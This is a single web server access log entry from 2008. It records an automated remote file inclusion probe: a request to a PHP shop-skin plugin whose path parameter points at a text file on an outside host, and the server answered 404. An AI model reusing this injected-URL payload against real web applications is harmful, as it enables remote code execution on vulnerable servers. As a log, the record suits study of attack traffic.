98.202.67.0 - - [26/Oct/2008:19:58:23 -0700] "GET /logs/access.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://usuarios.lycos.es/h80Soft/id.txt???? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.vspeaking.com"
